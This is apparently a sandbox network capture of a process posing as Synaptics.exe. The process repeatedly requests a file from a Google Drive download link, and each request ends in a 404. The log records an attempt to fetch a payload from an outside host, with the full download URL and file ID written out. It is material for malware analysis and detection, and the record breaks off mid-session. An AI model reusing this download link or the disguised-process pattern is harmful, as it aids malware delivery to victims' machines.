Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49858 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:08 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-81VldJIr29sABPa7Sp2xNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49874 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:10 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ooYVZFYZCPmqCA7c8J9LJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49875 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:10 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-23A9bjUlIpD1eel2OzSQgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49885 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:11 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:11 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7D8EYVwrZ65q-wBDCrbqclGYkQZmUy--ZA0fMzBRItSOe2exz2e4ahGHuQD5tPxLrK
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IsE7cgg9OWNgmp-IjqyAwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:11 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:11 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="VInXNs2iW1OdQMTBG7mq2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:11 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49886 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:11 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rGvV9JpJoJDmLiDPXS9AeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49890 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:11 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:12 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7wL1O7eGnQfbIyjnu79wQMcr1xxpXFfx4rB0hz0kJS5zRKSOxBeOrqX3ZsAFcV-R1G
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-J0qKS794tsts7Nnm1xi5yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:12 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:12 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="1WxF5sM0QDmDi8hGug9COw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:12 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49891 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:11 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-K6gFCVeo9eJu64PWrZOxpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49897 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gPKuonnt3-W1o9Ij1xBPIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49898 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:12 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:13 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6lgwcndIXYwfhWTqDwc76KZyCFonio53XjCTUiLrOsnKS02CUf0FrsfO0J3pQqmPIKhl8MTG4
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-mkOU95CkWifPwCZYfySFIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:13 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:13 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="PfItKLBf7ZVA6_yHEnWoEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:13 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49899 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rlzGVrTmdqQ2ylMtsUXCyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49900 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:12 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:13 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7ZCohLJhndXIVrhUDrQprUey4PkU95_cujm4JOPJBQCcfqRklXXH7tO5D602pXcHGN
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:13 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-o8fS_VFkkuSeTFvCDYEc6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
